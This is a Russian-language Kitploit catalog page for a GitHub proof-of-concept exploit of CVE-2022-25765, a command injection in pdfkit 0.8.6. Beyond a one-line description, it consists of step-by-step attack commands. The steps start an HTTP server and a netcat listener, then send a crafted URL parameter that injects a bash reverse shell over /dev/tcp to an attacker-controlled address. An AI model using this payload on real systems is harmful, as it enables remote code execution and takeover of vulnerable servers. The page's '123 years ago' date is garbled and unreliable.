Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PDFkit-CMD-Injection — Эксплойт proof-of-concept для CVE-2022-25765, демонстрирующий инъекцию команд в pdfkit 0.8.6 через несанитизированный параметр URL, позволяющий удаленное выполнение кода и reverse shell. | Kitploit
Инструменты/GitHubGitHub/lekosbelas/pdfkit-cmd-injection
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и Управление
GitHublekosbelas/pdfkit-cmd-injection

PDFkit-CMD-Injection

Эксплойт proof-of-concept для CVE-2022-25765, демонстрирующий инъекцию команд в pdfkit 0.8.6 через несанитизированный параметр URL, позволяющий удаленное выполнение кода и reverse shell.

Репозиторий
123 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PDFkit-CMD-Injection

Детали CVE-2022-25765

Описание

Пакет pdfkit, начиная с версии 0.0.0, уязвим к инъекции команд, поскольку URL-адрес должным образом не санируется.

PoC

Запустите HTTP-сервер

root@kitploit:~
1- python3 -m http.server 80

Запустите прослушиватель netcat

root@kitploit:~
2- nc -lnvp 'Target Port'

Отправьте запрос

root@kitploit:~
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}
Скачать инструмент